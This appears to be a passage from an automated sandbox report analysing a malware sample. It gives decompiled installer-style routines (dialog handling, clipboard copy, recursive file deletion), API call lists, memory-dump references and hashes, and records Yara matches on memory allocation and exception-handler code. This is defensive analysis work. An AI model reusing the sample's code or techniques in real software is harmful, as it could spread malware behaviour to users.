                                                  				_v40 = _v40 | 0xffffffff;
                                                  				_t177 = 2;
                                                  				_v60 = _t177;
                                                  				_v56 = 0;
                                                  				_v48 = 0;
                                                  				_v44 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_t130 =  *0x434f10;
                                                  				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                  				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                  				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                                                  				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                                                  				_t134 = GetDlgItem(_a4, 0x3f8);
                                                  				 *0x433ee4 = _t134;
                                                  				_v8 = _t134;
                                                  				E004044CE( *0x433ed0);
                                                  				 *0x433ed4 = E00404E27(4);
                                                  				 *0x433eec = 0;
                                                  				GetClientRect(_v8,  &_v28);
                                                  				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                  				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                  				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                  				if(_a8 >= 0) {
                                                  					SendMessageW(_v8, 0x1001, 0, _a8);
                                                  					SendMessageW(_v8, 0x1026, 0, _a8);
                                                  				}
                                                  				if(_a12 >= _t156) {
                                                  					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                  				}
                                                  				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                  				_push(0x1b);
                                                  				E00404499(_a4);
                                                  				if(( *0x434f18 & 0x00000003) != 0) {
                                                  					ShowWindow( *0x433ed0, _t156);
                                                  					if(( *0x434f18 & 0x00000002) != 0) {
                                                  						 *0x433ed0 = _t156;
                                                  					} else {
                                                  						ShowWindow(_v8, 8);
                                                  					}
                                                  					E004044CE( *0x433ec8);
                                                  				}
                                                  				_t168 = GetDlgItem(_a4, 0x3ec);
                                                  				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                  				if(( *0x434f18 & 0x00000004) != 0) {
                                                  					SendMessageW(_t168, 0x409, _t156, _a12);
                                                  					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                  				}
                                                  				goto L36;
                                                  			}



































                                                  0x004056e6
                                                  0x004056ec
                                                  0x004056f6
                                                  0x004056f9
                                                  0x0040588f
                                                  0x004058ac
                                                  0x004058b3
                                                  0x004058b3
                                                  0x004058c6
                                                  0x004058e4
                                                  0x004058e6
                                                  0x004058ee
                                                  0x00405944
                                                  0x00405948
                                                  0x00000000
                                                  0x00000000
                                                  0x0040594a
                                                  0x00405950
                                                  0x00000000
                                                  0x00000000
                                                  0x0040595a
                                                  0x00405962
                                                  0x00405965
                                                  0x00405a67
                                                  0x00000000
                                                  0x00405a67
                                                  0x00405974
                                                  0x0040597f
                                                  0x00405988
                                                  0x00405993
                                                  0x00405996
                                                  0x0040599f
                                                  0x004059a5
                                                  0x004059a8
                                                  0x004059a8
                                                  0x004059c0
                                                  0x004059c9
                                                  0x004059cc
                                                  0x004059d3
                                                  0x004059da
                                                  0x004059e2
                                                  0x004059e2
                                                  0x004059f9
                                                  0x004059f9
                                                  0x00405a00
                                                  0x00405a06
                                                  0x00405a12
                                                  0x00405a19
                                                  0x00405a22
                                                  0x00405a24
                                                  0x00405a27
                                                  0x00405a36
                                                  0x00405a39
                                                  0x00405a3f
                                                  0x00405a40
                                                  0x00405a46
                                                  0x00405a47
                                                  0x00405a48
                                                  0x00405a50
                                                  0x00405a5b
                                                  0x00405a61
                                                  0x00405a61
                                                  0x00000000
                                                  0x004059c0
                                                  0x004058f6
                                                  0x00405926
                                                  0x0040592e
                                                  0x00405930
                                                  0x00405936
                                                  0x00405939
                                                  0x00405939
                                                  0x0040593f
                                                  0x00000000
                                                  0x0040593f
                                                  0x004058fa
                                                  0x00405904
                                                  0x00000000
                                                  0x004058c8
                                                  0x004058ce
                                                  0x00405909
                                                  0x00000000
                                                  0x00405912
                                                  0x004058d7
                                                  0x004058dc
                                                  0x004058df
                                                  0x00000000
                                                  0x004058df
                                                  0x004058c6
                                                  0x004056ff
                                                  0x00405703
                                                  0x0040570b
                                                  0x0040570f
                                                  0x00405712
                                                  0x00405715
                                                  0x00405718
                                                  0x0040571b
                                                  0x0040571c
                                                  0x0040571d
                                                  0x00405736
                                                  0x00405739
                                                  0x00405743
                                                  0x00405752
                                                  0x0040575a
                                                  0x00405762
                                                  0x00405767
                                                  0x0040576a
                                                  0x00405776
                                                  0x0040577f
                                                  0x00405788
                                                  0x004057aa
                                                  0x004057b0
                                                  0x004057c1
                                                  0x004057c6
                                                  0x004057d4
                                                  0x004057e2
                                                  0x004057e2
                                                  0x004057e7
                                                  0x004057f5
                                                  0x004057f5
                                                  0x004057fa
                                                  0x004057fd
                                                  0x00405802
                                                  0x0040580e
                                                  0x00405817
                                                  0x00405824
                                                  0x00405833
                                                  0x00405826
                                                  0x0040582b
                                                  0x0040582b
                                                  0x0040583f
                                                  0x0040583f
                                                  0x00405853
                                                  0x0040585c
                                                  0x00405865
                                                  0x00405875
                                                  0x00405881
                                                  0x00405881
                                                  0x00000000

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 0040573C
                                                  • GetDlgItem.USER32 ref: 0040574B
                                                  • GetClientRect.USER32 ref: 00405788
                                                  • GetSystemMetrics.USER32 ref: 0040578F
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                  • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                  • GetDlgItem.USER32 ref: 0040584C
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                  • GetDlgItem.USER32 ref: 0040575A
                                                    • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                  • GetDlgItem.USER32 ref: 0040589E
                                                  • CreateThread.KERNELBASE ref: 004058AC
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004058B3
                                                  • ShowWindow.USER32(00000000), ref: 004058D7
                                                  • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                  • ShowWindow.USER32(00000008), ref: 00405926
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                  • CreatePopupMenu.USER32 ref: 0040596B
                                                  • AppendMenuW.USER32 ref: 0040597F
                                                  • GetWindowRect.USER32 ref: 0040599F
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                  • OpenClipboard.USER32(00000000), ref: 00405A00
                                                  • EmptyClipboard.USER32 ref: 00405A06
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                  • GlobalLock.KERNEL32 ref: 00405A1C
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                  • SetClipboardData.USER32 ref: 00405A5B
                                                  • CloseClipboard.USER32 ref: 00405A61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                  • String ID: {
                                                  • API String ID: 4154960007-366298937
                                                  • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                  • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                  • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                  • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 442 405c49-405c6f call 405f14 445 405c71-405c83 DeleteFileW 442->445 446 405c88-405c8f 442->446 447 405e05-405e09 445->447 448 405c91-405c93 446->448 449 405ca2-405cb2 call 40653d 446->449 450 405db3-405db8 448->450 451 405c99-405c9c 448->451 455 405cc1-405cc2 call 405e58 449->455 456 405cb4-405cbf lstrcatW 449->456 450->447 454 405dba-405dbd 450->454 451->449 451->450 457 405dc7-405dcf call 406873 454->457 458 405dbf-405dc5 454->458 460 405cc7-405ccb 455->460 456->460 457->447 466 405dd1-405de5 call 405e0c call 405c01 457->466 458->447 463 405cd7-405cdd lstrcatW 460->463 464 405ccd-405cd5 460->464 465 405ce2-405cfe lstrlenW FindFirstFileW 463->465 464->463 464->465 467 405d04-405d0c 465->467 468 405da8-405dac 465->468 482 405de7-405dea 466->482 483 405dfd-405e00 call 40559f 466->483 470 405d2c-405d40 call 40653d 467->470 471 405d0e-405d16 467->471 468->450 473 405dae 468->473 484 405d42-405d4a 470->484 485 405d57-405d62 call 405c01 470->485 474 405d18-405d20 471->474 475 405d8b-405d9b FindNextFileW 471->475 473->450 474->470 478 405d22-405d2a 474->478 475->467 481 405da1-405da2 FindClose 475->481 478->470 478->475 481->468 482->458 486 405dec-405dfb call 40559f call 4062fd 482->486 483->447 484->475 487 405d4c-405d55 call 405c49 484->487 493 405d83-405d86 call 40559f 485->493 494 405d64-405d67 485->494 486->447 487->475 493->475 497 405d69-405d79 call 40559f call 4062fd 494->497 498 405d7b-405d81 494->498 497->475 498->475
                                                  C-Code - Quality: 98%
                                                  			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				short _v556;
                                                  				short _v558;
                                                  				struct _WIN32_FIND_DATAW _v604;
                                                  				signed int _t38;
                                                  				signed int _t52;
                                                  				signed int _t55;
                                                  				signed int _t62;
                                                  				void* _t64;
                                                  				signed char _t65;
                                                  				WCHAR* _t66;
                                                  				void* _t67;
                                                  				WCHAR* _t68;
                                                  				void* _t70;
                                                  
                                                  				_t65 = _a8;
                                                  				_t68 = _a4;
                                                  				_v8 = _t65 & 0x00000004;
                                                  				_t38 = E00405F14(__eflags, _t68);
                                                  				_v12 = _t38;
                                                  				if((_t65 & 0x00000008) != 0) {
                                                  					_t62 = DeleteFileW(_t68); // executed
                                                  					asm("sbb eax, eax");
                                                  					_t64 =  ~_t62 + 1;
                                                  					 *0x434f88 =  *0x434f88 + _t64;
                                                  					return _t64;
                                                  				}
                                                  				_a4 = _t65;
                                                  				_t8 =  &_a4;
                                                  				 *_t8 = _a4 & 0x00000001;
                                                  				__eflags =  *_t8;
                                                  				if( *_t8 == 0) {
                                                  					L5:
                                                  					E0040653D(0x42f270, _t68);
                                                  					__eflags = _a4;
                                                  					if(_a4 == 0) {
                                                  						E00405E58(_t68);
                                                  					} else {
                                                  						lstrcatW(0x42f270, L"\\*.*");
                                                  					}
                                                  					__eflags =  *_t68;
                                                  					if( *_t68 != 0) {
                                                  						L10:
                                                  						lstrcatW(_t68, 0x40a014);
                                                  						L11:
                                                  						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                  						_t38 = FindFirstFileW(0x42f270,  &_v604);
                                                  						_t70 = _t38;
                                                  						__eflags = _t70 - 0xffffffff;
                                                  						if(_t70 == 0xffffffff) {
                                                  							L26:
                                                  							__eflags = _a4;
                                                  							if(_a4 != 0) {
                                                  								_t30 = _t66 - 2;
                                                  								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                  								__eflags =  *_t30;
                                                  							}
                                                  							goto L28;
                                                  						} else {
                                                  							goto L12;
                                                  						}
                                                  						do {
                                                  							L12:
                                                  							__eflags = _v604.cFileName - 0x2e;
                                                  							if(_v604.cFileName != 0x2e) {
                                                  								L16:
                                                  								E0040653D(_t66,  &(_v604.cFileName));
                                                  								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                  								if(__eflags == 0) {
                                                  									_t52 = E00405C01(__eflags, _t68, _v8);
                                                  									__eflags = _t52;
                                                  									if(_t52 != 0) {
                                                  										E0040559F(0xfffffff2, _t68);
                                                  									} else {
                                                  										__eflags = _v8 - _t52;
                                                  										if(_v8 == _t52) {
                                                  											 *0x434f88 =  *0x434f88 + 1;
                                                  										} else {
                                                  											E0040559F(0xfffffff1, _t68);
                                                  											E004062FD(_t67, _t68, 0);
                                                  										}
                                                  									}
                                                  								} else {
                                                  									__eflags = (_a8 & 0x00000003) - 3;
                                                  									if(__eflags == 0) {
                                                  										E00405C49(__eflags, _t68, _a8);
                                                  									}
                                                  								}
                                                  								goto L24;
                                                  							}
                                                  							__eflags = _v558;
                                                  							if(_v558 == 0) {
                                                  								goto L24;
                                                  							}
                                                  							__eflags = _v558 - 0x2e;
                                                  							if(_v558 != 0x2e) {
                                                  								goto L16;
                                                  							}
                                                  							__eflags = _v556;
                                                  							if(_v556 == 0) {
                                                  								goto L24;
                                                  							}
                                                  							goto L16;
                                                  							L24:
                                                  							_t55 = FindNextFileW(_t70,  &_v604);
                                                  							__eflags = _t55;
                                                  						} while (_t55 != 0);
                                                  						_t38 = FindClose(_t70);
                                                  						goto L26;
                                                  					}
                                                  					__eflags =  *0x42f270 - 0x5c;
                                                  					if( *0x42f270 != 0x5c) {
                                                  						goto L11;
                                                  					}
                                                  					goto L10;
                                                  				} else {
                                                  					__eflags = _t38;
                                                  					if(_t38 == 0) {
                                                  						L28:
                                                  						__eflags = _a4;
                                                  						if(_a4 == 0) {
                                                  							L36:
                                                  							return _t38;
                                                  						}
                                                  						__eflags = _v12;
                                                  						if(_v12 != 0) {
                                                  							_t38 = E00406873(_t68);
                                                  							__eflags = _t38;
                                                  							if(_t38 == 0) {
                                                  								goto L36;
                                                  							}
                                                  							E00405E0C(_t68);
                                                  							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                                                  							__eflags = _t38;
                                                  							if(_t38 != 0) {
                                                  								return E0040559F(0xffffffe5, _t68);
                                                  							}
                                                  							__eflags = _v8;
                                                  							if(_v8 == 0) {
                                                  								goto L30;
                                                  							}
                                                  							E0040559F(0xfffffff1, _t68);
                                                  							return E004062FD(_t67, _t68, 0);
                                                  						}
                                                  						L30:
                                                  						 *0x434f88 =  *0x434f88 + 1;
                                                  						return _t38;
                                                  					}
                                                  					__eflags = _t65 & 0x00000002;
                                                  					if((_t65 & 0x00000002) == 0) {
                                                  						goto L28;
                                                  					}
                                                  					goto L5;
                                                  				}
                                                  			}


















                                                  0x00405c53
                                                  0x00405c58
                                                  0x00405c61
                                                  0x00405c64
                                                  0x00405c6c
                                                  0x00405c6f
                                                  0x00405c72
                                                  0x00405c7a
                                                  0x00405c7c
                                                  0x00405c7d
                                                  0x00000000
                                                  0x00405c7d
                                                  0x00405c88
                                                  0x00405c8b
                                                  0x00405c8b
                                                  0x00405c8b
                                                  0x00405c8f
                                                  0x00405ca2
                                                  0x00405ca9
                                                  0x00405cae
                                                  0x00405cb2
                                                  0x00405cc2
                                                  0x00405cb4
                                                  0x00405cba
                                                  0x00405cba
                                                  0x00405cc7
                                                  0x00405ccb
                                                  0x00405cd7
                                                  0x00405cdd
                                                  0x00405ce2
                                                  0x00405ce8
                                                  0x00405cf3
                                                  0x00405cf9
                                                  0x00405cfb
                                                  0x00405cfe
                                                  0x00405da8
                                                  0x00405da8
                                                  0x00405dac
                                                  0x00405dae
                                                  0x00405dae
                                                  0x00405dae
                                                  0x00405dae
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d04
                                                  0x00405d04
                                                  0x00405d04
                                                  0x00405d0c
                                                  0x00405d2c
                                                  0x00405d34
                                                  0x00405d39
                                                  0x00405d40
                                                  0x00405d5b
                                                  0x00405d60
                                                  0x00405d62
                                                  0x00405d86
                                                  0x00405d64
                                                  0x00405d64
                                                  0x00405d67
                                                  0x00405d7b
                                                  0x00405d69
                                                  0x00405d6c
                                                  0x00405d74
                                                  0x00405d74
                                                  0x00405d67
                                                  0x00405d42
                                                  0x00405d48
                                                  0x00405d4a
                                                  0x00405d50
                                                  0x00405d50
                                                  0x00405d4a
                                                  0x00000000
                                                  0x00405d40
                                                  0x00405d0e
                                                  0x00405d16
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d18
                                                  0x00405d20
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d22
                                                  0x00405d2a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d8b
                                                  0x00405d93
                                                  0x00405d99
                                                  0x00405d99
                                                  0x00405da2
                                                  0x00000000
                                                  0x00405da2
                                                  0x00405ccd
                                                  0x00405cd5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405c91
                                                  0x00405c91
                                                  0x00405c93
                                                  0x00405db3
                                                  0x00405db5
                                                  0x00405db8
                                                  0x00405e09
                                                  0x00405e09
                                                  0x00405e09
                                                  0x00405dba
                                                  0x00405dbd
                                                  0x00405dc8
                                                  0x00405dcd
                                                  0x00405dcf
                                                  0x00000000
                                                  0x00000000
                                                  0x00405dd2
                                                  0x00405dde
                                                  0x00405de3
                                                  0x00405de5
                                                  0x00000000
                                                  0x00405e00
                                                  0x00405de7
                                                  0x00405dea
                                                  0x00000000
                                                  0x00000000
                                                  0x00405def
                                                  0x00000000
                                                  0x00405df6
                                                  0x00405dbf
                                                  0x00405dbf
                                                  0x00000000
                                                  0x00405dbf
                                                  0x00405c99
                                                  0x00405c9c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405c9c

                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,7519FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                  • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,7519FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                  • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,7519FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                  • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-1049245928
                                                  • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                  • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                  • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                  • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406873(WCHAR* _a4) {
                                                  				void* _t2;
                                                  
                                                  				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                                                  				if(_t2 == 0xffffffff) {
                                                  					return 0;
                                                  				}
                                                  				FindClose(_t2);
                                                  				return 0x4302b8;
                                                  			}




                                                  0x0040687e
                                                  0x00406887
                                                  0x00000000
                                                  0x00406894
                                                  0x0040688a
                                                  0x00000000

                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(7519FAA0,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,7519FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,7519FAA0,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                  • FindClose.KERNEL32(00000000), ref: 0040688A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                  • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                  • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                  • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(286DCCCF,?,313A8EC5), ref: 02A55804
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: 320378bb17433be3b1c954e5864f63ce45e0e620effb490e451f2c30531167e6
                                                  • Instruction ID: afd7674021aecd79a61f82fc6bab40970cd43704739e0489456a66ad6c17dda9
                                                  • Opcode Fuzzy Hash: 320378bb17433be3b1c954e5864f63ce45e0e620effb490e451f2c30531167e6
                                                  • Instruction Fuzzy Hash: 3C41DEB56013898FDBB49E28CD957DB37A2AF59380F45442EEC8D9B210E7359A848B02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlAddVectoredExceptionHandler.NTDLL(00000001,02A582BF,-0000000153298D62,02A5641C,00000000,02A501AE), ref: 02A58170
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionHandlerVectored
                                                  • String ID:
                                                  • API String ID: 3310709589-0
                                                  • Opcode ID: 69365e01956e7cd565daaf395655f14a8abc30b9fe409a38869ac682a29ae20b
                                                  • Instruction ID: b17705918dd82662746610d03da05defa002e3990ebc1f137b47611eba9d72c8
                                                  • Opcode Fuzzy Hash: 69365e01956e7cd565daaf395655f14a8abc30b9fe409a38869ac682a29ae20b
                                                  • Instruction Fuzzy Hash: DAF0E771600A99CFDB25DE68CED93CA37A2BF88355F254539CD099F704CB34A9898B00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 197 403fbe-403fc7 195->197 198 404171-404186 196->198 199 404124-40415f GetDlgItem * 2 call 404499 KiUserCallbackDispatcher call 40140b 196->199 202 403fc9-403fd6 SetWindowPos 197->202 203 403fdc-403fe3 197->203 200 4041c6-4041cb call 4044e5 198->200 201 404188-40418b 198->201 219 404164-40416c 199->219 216 4041d0-4041eb 200->216 206 40418d-404198 call 401389 201->206 207 4041be-4041c0 201->207 202->203 209 403fe5-403fff ShowWindow 203->209 210 404027-40402d 203->210 206->207 232 40419a-4041b9 SendMessageW 206->232 207->200 215 404466 207->215 217 404100-40410e call 404500 209->217 218 404005-404018 GetWindowLongW 209->218 212 404046-404049 210->212 213 40402f-404041 DestroyWindow 210->213 222 40404b-404057 SetWindowLongW 212->222 223 40405c-404062 212->223 220 404443-404449 213->220 221 404468-40446f 215->221 226 4041f4-4041fa 216->226 227 4041ed-4041ef call 40140b 216->227 217->221 218->217 228 40401e-404021 ShowWindow 218->228 219->198 220->215 235 40444b-404451 220->235 222->221 223->217 231 404068-404077 GetDlgItem 223->231 229 404200-40420b 226->229 230 404424-40443d DestroyWindow EndDialog 226->230 227->226 228->210 229->230 237 404211-40425e call 40657a call 404499 * 3 GetDlgItem 229->237 230->220 238 404096-404099 231->238 239 404079-404090 SendMessageW IsWindowEnabled 231->239 232->221 235->215 236 404453-40445c ShowWindow 235->236 236->215 266 404260-404265 237->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 237->267 241 40409b-40409c 238->241 242 40409e-4040a1 238->242 239->215 239->238 244 4040cc-4040d1 call 404472 241->244 245 4040a3-4040a9 242->245 246 4040af-4040b4 242->246 244->217 249 4040ea-4040fa SendMessageW 245->249 250 4040ab-4040ad 245->250 246->249 251 4040b6-4040bc 246->251 249->217 250->244 254 4040d3-4040dc call 40140b 251->254 255 4040be-4040c4 call 40140b 251->255 254->217 264 4040de-4040e8 254->264 262 4040ca 255->262 262->244 264->262 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->216 286 404339-40433b 275->286 286->216 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->220 291 40437e-4043ab CreateDialogParamW 288->291 289->215 290 404353-404359 289->290 290->216 292 40435f 290->292 291->220 293 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->215 293->215 298 40440a-40441d ShowWindow call 4044e5 293->298 300 404422 298->300 300->220
                                                  C-Code - Quality: 84%
                                                  			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                  				struct HWND__* _v28;
                                                  				void* _v84;
                                                  				void* _v88;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t34;
                                                  				signed int _t36;
